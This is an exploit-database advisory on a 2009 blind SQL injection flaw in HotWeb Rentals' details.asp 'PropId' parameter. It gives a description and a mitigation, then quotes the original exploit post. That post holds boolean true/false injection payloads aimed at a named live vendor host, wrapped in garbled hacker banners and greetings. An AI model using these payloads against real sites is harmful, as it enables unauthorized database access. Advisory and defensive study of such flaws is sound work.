BL!ND SQL Injection Vulnerability

vendor:

HotWeb Rentals

by:

Ñ�3d D3v!L

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: HotWeb Rentals

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: a:hotwebscripts:hotweb_rentals

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

BL!ND SQL Injection Vulnerability

A BL!ND SQL Injection vulnerability was discovered in HotWeb Rentals, a software developed by www.hotwebscripts.co.uk. The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'PropId' parameter to 'details.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can allow the attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and compromise the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, and special characters should be escaped or removed.

Source

Exploit-DB raw data:

 [â˜¢] â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢{Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…}â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢â˜¢
[â˜ ]
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
[â˜ ]
[~] Vendor: www.hotwebscripts.co.uk
[â˜ ]
[â˜ ] Software: HotWeb Rentals 
[â˜ ]
[â˜ ] author: ((Ñ3d D3v!L))
[â˜ ]
[â˜ ] Date: 15.2.2009
[â˜ ]
[â˜ ] Home: CL053D
[â˜ ]
[â˜ ] contact: X@hotmail.co.jp
[â˜ ]â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ {DEV!L'5 of SYST3M}â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ â˜ 

[â˜ ] ERR0R CONSOLE

WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)

[â˜ ]SECURE ALERT FR0M 7h3 R3d-D3V!L

[â˜ ] Exploit:

[â˜ ] TRU3 : details.asp?PropId=1+and+1=1


 [â˜ ] FALS3 : details.asp?PropId=1+and+1=2

[â˜ ]liv3 3xpL0!T:
[â˜ ] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[â˜ ] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2


 [â˜ ]

N073:
R34L R3d-D3V!L WAS h3R3 ((â˜ X@Minhal.co.ilâ˜ ))

4R48!4N-HACK3R!!Ø§Ù„Ù‚Ø±Ø§ØµÙ†Ù‡ Ø§Ù„Ø¹Ø±Ø¨

 [~]-----------------------------{str0ke}-----------------------------------------------------

[~] Greetz tO: {str0ke} & XP_10 & Ø±ÙˆØª Ø´ÙŠÙ„ & Ø§Ø¨Ùˆ Ø´Ù‡Ø¯ & B0rN 2 K!LL & JUPA &D3V!L-FUCK3R & Ø§Ù„Ø²Ù‡ÙŠØ±ÙŠ
 [~]70 ÙALL ARAB!AN HACKER 3X3PT:LAM3RZ
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y  

 [â˜ ]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''

[â˜ ] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007

  [~]spechial FR!ND: 74M3M ØªÙ…ÙŠÙ…

[~] !'M 4R48!4N 3XPL0!73R.

  [~]

[~]--------------------------------------------------------------------------------

# milw0rm.com [2009-09-15]